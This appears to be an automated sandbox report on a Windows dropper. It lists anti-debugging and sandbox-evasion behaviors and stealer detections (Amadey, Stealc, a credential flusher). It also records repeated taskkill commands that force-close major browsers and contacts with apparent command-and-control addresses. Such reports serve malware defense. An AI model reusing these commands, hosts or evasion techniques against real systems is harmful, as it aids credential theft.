Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05520BF8 rdtsc 0_2_05520BF8
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0095EAA2 BlockInput, 8_2_0095EAA2
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00912622
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_008E42DE
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A0645B mov eax, dword ptr fs:[00000030h] 6_2_00A0645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_00A0A1C2 mov eax, dword ptr fs:[00000030h] 6_2_00A0A1C2
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00904CE8 mov eax, dword ptr fs:[00000030h] 8_2_00904CE8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 8_2_00940B62
Enables debug privileges
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00912622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00912622
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0090083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_0090083F
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009009D5 SetUnhandledExceptionFilter, 8_2_009009D5
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00900C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00900C21
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Memory protected: page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Yara detected Powershell download and execute
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 1992, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 2460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 5636, type: MEMORYSTR
Excessive usage of taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Contains functionality to execute programs as a different user
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00941201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 8_2_00941201
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00922BA5 KiUserCallbackDispatcher,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 8_2_00922BA5
Contains functionality to simulate keystroke presses
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0094B226 SendInput,keybd_event, 8_2_0094B226
Contains functionality to simulate mouse events
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_009622DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event, 8_2_009622DA
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe "C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process created: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe "C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe" Jump to behavior
Uses taskkill to terminate processes
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00940B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 8_2_00940B62
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00941663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 8_2_00941663
Source: b29e59e54d.exe, 00000008.00000000.2703523532.00000000009A2000.00000002.00000001.01000000.0000000A.sdmp, b29e59e54d.exe, 0000001A.00000000.2859812436.00000000009A2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: axplong.exe, axplong.exe, 00000006.00000002.3282431990.0000000000BC9000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Program Manager
Source: b29e59e54d.exe Binary or memory string: Shell_TrayWnd
Source: 63371c25d6.exe Binary or memory string: '@Program Manager
Source: firefox.exe, 00000015.00000002.2875037353.000000C16CDFB000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3044378104.0000002786BFB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: 63371c25d6.exe, 00000007.00000002.2737809197.0000000000A9C000.00000040.00000001.01000000.00000009.sdmp Binary or memory string: @Program Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_009ED312 cpuid 6_2_009ED312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002741001\63371c25d6.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00958195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW, 8_2_00958195
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0093D27A GetUserNameW, 8_2_0093D27A
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_0091B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free, 8_2_0091B952
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_008E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_008E42DE

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.axplong.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.axplong.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.axplong.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.fd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000003.2634377823.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.3281517208.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2072225020.00000000051D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2065985660.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2038538990.0000000005300000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2112575730.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2106923649.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2078807480.0000000000FD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: b29e59e54d.exe PID: 2940, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b29e59e54d.exe PID: 6976, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000007.00000003.2679501298.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2788035589.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2828445859.00000000006C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2949800933.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3013597839.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2831755373.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2737464357.00000000006C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3011470230.00000000006C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2739218915.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 1992, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 2460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
OS version to string mapping found (often used in BOTs)
Source: b29e59e54d.exe Binary or memory string: WIN_81
Source: b29e59e54d.exe Binary or memory string: WIN_XP
Source: b29e59e54d.exe, 0000001A.00000000.2859812436.00000000009A2000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: b29e59e54d.exe Binary or memory string: WIN_XPe
Source: b29e59e54d.exe Binary or memory string: WIN_VISTA
Source: b29e59e54d.exe Binary or memory string: WIN_7
Source: b29e59e54d.exe Binary or memory string: WIN_8

Remote Access Functionality
barindex
Yara detected Credential Flusher
Source: Yara match File source: Process Memory Space: b29e59e54d.exe PID: 2940, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: b29e59e54d.exe PID: 6976, type: MEMORYSTR
Yara detected Stealc
Source: Yara match File source: 00000007.00000003.2679501298.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.2788035589.0000000005070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2828445859.00000000006C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.2949800933.0000000004A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3013597839.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.2831755373.000000000119B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2737464357.00000000006C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.3011470230.00000000006C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2739218915.00000000011AE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 1992, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 2460, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 63371c25d6.exe PID: 5636, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00961204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 8_2_00961204
Source: C:\Users\user\AppData\Local\Temp\1002742001\b29e59e54d.exe Code function: 8_2_00961806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_00961806
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554128 Sample: file.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 100 80 youtube.com 2->80 82 spocs.getpocket.com 2->82 84 13 other IPs or domains 2->84 96 Multi AV Scanner detection for domain / URL 2->96 98 Suricata IDS alerts for network traffic 2->98 100 Found malware configuration 2->100 102 16 other signatures 2->102 9 axplong.exe 2 19 2->9         started        14 file.exe 5 2->14         started        16 axplong.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 94 185.215.113.16, 49937, 49958, 49978 WHOLESALECONNECTIONSNL Portugal 9->94 68 C:\Users\user\AppData\...\b29e59e54d.exe, PE32 9->68 dropped 70 C:\Users\user\AppData\...\63371c25d6.exe, PE32 9->70 dropped 72 C:\Users\user\AppData\Local\...\random[1].exe, PE32 9->72 dropped 74 C:\Users\user\AppData\Local\...\random[1].exe, PE32 9->74 dropped 124 Creates multiple autostart registry keys 9->124 126 Hides threads from debuggers 9->126 128 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->128 20 63371c25d6.exe 13 9->20         started        24 b29e59e54d.exe 9->24         started        76 C:\Users\user\AppData\Local\...\axplong.exe, PE32 14->76 dropped 78 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 14->78 dropped 130 Detected unpacking (changes PE section rights) 14->130 132 Tries to evade debugger and weak emulator (self modifying code) 14->132 134 Tries to detect virtualization through RDTSC time measurements 14->134 26 axplong.exe 14->26         started        136 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 16->136 138 Binary is likely a compiled AutoIt script file 18->138 140 Excessive usage of taskkill to terminate processes 18->140 28 firefox.exe 3 58 18->28         started        30 firefox.exe 18->30         started        32 firefox.exe 18->32         started        34 10 other processes 18->34 file6 signatures7 process8 dnsIp9 86 185.215.113.206, 49974, 50008, 50027 WHOLESALECONNECTIONSNL Portugal 20->86 104 Antivirus detection for dropped file 20->104 106 Multi AV Scanner detection for dropped file 20->106 108 Detected unpacking (changes PE section rights) 20->108 122 3 other signatures 20->122 110 Binary is likely a compiled AutoIt script file 24->110 112 Found API chain indicative of sandbox detection 24->112 114 Excessive usage of taskkill to terminate processes 24->114 36 taskkill.exe 1 24->36         started        38 taskkill.exe 1 24->38         started        40 taskkill.exe 1 24->40         started        50 3 other processes 24->50 116 Machine Learning detection for dropped file 26->116 118 Tries to evade debugger and weak emulator (self modifying code) 26->118 120 Hides threads from debuggers 26->120 88 youtube.com 142.250.185.78, 443, 49994, 49997 GOOGLEUS United States 28->88 90 prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82, 49998, 50000, 50013 GOOGLEUS United States 28->90 92 5 other IPs or domains 28->92 42 firefox.exe 28->42         started        44 firefox.exe 28->44         started        46 firefox.exe 30->46         started        48 firefox.exe 32->48         started        52 10 other processes 34->52 signatures10 process11 process12 54 conhost.exe 36->54         started        56 conhost.exe 38->56         started        58 conhost.exe 40->58         started        60 firefox.exe 46->60         started        62 firefox.exe 48->62         started        64 conhost.exe 50->64         started        66 conhost.exe 50->66         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.185.78
 youtube.com United States
15169 GOOGLEUS false
35.244.181.201
 prod.balrog.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false
34.117.188.166
 prod.ads.prod.webservices.mozgcp.net United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
185.215.113.206
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
35.190.72.216
 prod.classify-client.prod.webservices.mozgcp.net United States
15169 GOOGLEUS false
34.160.144.191
 prod.content-signature-chains.prod.webservices.mozgcp.net United States
2686 ATGS-MMD-ASUS false
34.107.221.82
 prod.detectportal.prod.cloudops.mozgcp.net United States
15169 GOOGLEUS false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
example.org 93.184.215.14 true
prod.classify-client.prod.webservices.mozgcp.net 35.190.72.216 true
prod.balrog.prod.cloudops.mozgcp.net 35.244.181.201 true
prod.detectportal.prod.cloudops.mozgcp.net 34.107.221.82 true
ipv4only.arpa 192.0.0.171 true
prod.ads.prod.webservices.mozgcp.net 34.117.188.166 true
contile.services.mozilla.com 34.117.188.166 true
youtube.com 142.250.185.78 true
prod.content-signature-chains.prod.webservices.mozgcp.net 34.160.144.191 true
spocs.getpocket.com unknown unknown
detectportal.firefox.com unknown unknown
content-signature-2.cdn.mozilla.net unknown unknown
shavar.services.mozilla.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.206/ false
    		high
    185.215.113.206/c4becf79229cb002.php false
      		high